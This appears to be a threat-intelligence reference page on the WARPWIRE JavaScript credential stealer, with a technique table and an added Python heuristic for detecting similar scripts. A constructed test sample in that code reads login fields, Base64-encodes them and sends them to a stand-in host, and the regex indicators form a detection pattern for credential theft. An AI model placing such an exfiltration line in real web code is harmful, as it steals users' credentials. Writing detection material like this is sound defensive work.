S1116 WARPWIRE
WARPWIRE is a JavaScript credential stealer that targets plaintext usernames and passwords for exfiltration; it was used during Cutting Edge to target Ivanti Connect Secure VPNs.[2][1]
| Item | Value |
|---|---|
| ID | S1116 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.1 |
| Created | 05 March 2024 |
| Last Modified | 15 April 2025 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.007 | JavaScript | WARPWIRE is a credential harvester written in JavaScript.[2] |
| enterprise | T1554 | Compromise Host Software Binary | WARPWIRE can embed itself into a legitimate file on compromised Ivanti Connect Secure VPNs.[2] |
| enterprise | T1132 | Data Encoding | - |
| enterprise | T1132.001 | Standard Encoding | WARPWIRE can Base64 encode captured credentials with btoa() prior to sending them to C2.[2] |
| enterprise | T1048 | Exfiltration Over Alternative Protocol | - |
| enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol | WARPWIRE can send captured credentials to C2 via HTTP GET or POST requests.[2][1] |
| enterprise | T1056 | Input Capture | - |
| enterprise | T1056.003 | Web Portal Capture | WARPWIRE can capture credentials submitted during the web logon process in order to access layer seven applications such as RDP.[2] |
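The behaviours in the table above (reading the web logon form, Base64-encoding with btoa(), sending the result in an HTTP GET/POST) can be turned into a triage heuristic for JavaScript files pulled from an appliance's web root. This is an added example, not ATT&CK's or the Cutting Edge reports' code; the indicator names, the two sample scripts and the c2.invalid host are constructed for illustration.

```python
import re

# Heuristic indicators taken from the WARPWIRE description on this page:
# the script reads the web logon form, Base64-encodes the values with
# btoa(), and sends them out in an HTTP GET/POST to an absolute URL.
# Each indicator alone is common in legitimate code; only the
# co-occurrence of all four is treated as worth a closer look.
INDICATORS = {
    "reads_login_fields": re.compile(
        r"""type\s*=\s*['"]?password['"]?|\bpassword\b|\busername\b""", re.I),
    "base64_with_btoa": re.compile(r"\bbtoa\s*\("),
    "http_send": re.compile(
        r"""\bfetch\s*\(|new\s+XMLHttpRequest\b|new\s+Image\s*\(|\.open\s*\(\s*['"](GET|POST)['"]""",
        re.I),
    "absolute_destination": re.compile(r"https?://", re.I),
}


def assess_script(source: str) -> dict:
    """Report which indicators fire and whether all of them co-occur."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    hits["matches_warpwire_pattern"] = all(hits[k] for k in INDICATORS)
    return hits


def scan_files(paths):
    """Assess each JavaScript file on disk; the caller supplies the paths."""
    results = {}
    for p in paths:
        with open(p, encoding="utf-8", errors="replace") as fh:
            results[p] = assess_script(fh.read())
    return results


# Constructed samples for offline use; neither is WARPWIRE's actual code.
BENIGN_JS = """
var u = document.getElementById('username').value;
if (!u) { alert('enter username'); }
"""

SUSPECT_JS = """
var u = document.getElementById('username').value;
var p = document.querySelector('input[type=password]').value;
new Image().src = 'https://c2.invalid/?d=' + btoa(u + ':' + p);
"""

if __name__ == "__main__":
    for label, js in (("benign", BENIGN_JS), ("suspect", SUSPECT_JS)):
        print(label, assess_script(js))
```

A hit is a triage signal, not a verdict: confirm by diffing the flagged file against the vendor's known-good copy, since legitimate login code also touches these fields.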
References
- [1] Lin, M. et al. (2024, January 31). Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation. Retrieved February 27, 2024.
- [2] McLellan, T. et al. (2024, January 12). Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation. Retrieved February 27, 2024.
- [3] Gurkok, C. et al. (2024, January 15). Ivanti Connect Secure VPN Exploitation Goes Global. Retrieved February 27, 2024.
- [4] Meltzer, M. et al. (2024, January 10). Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN. Retrieved February 27, 2024.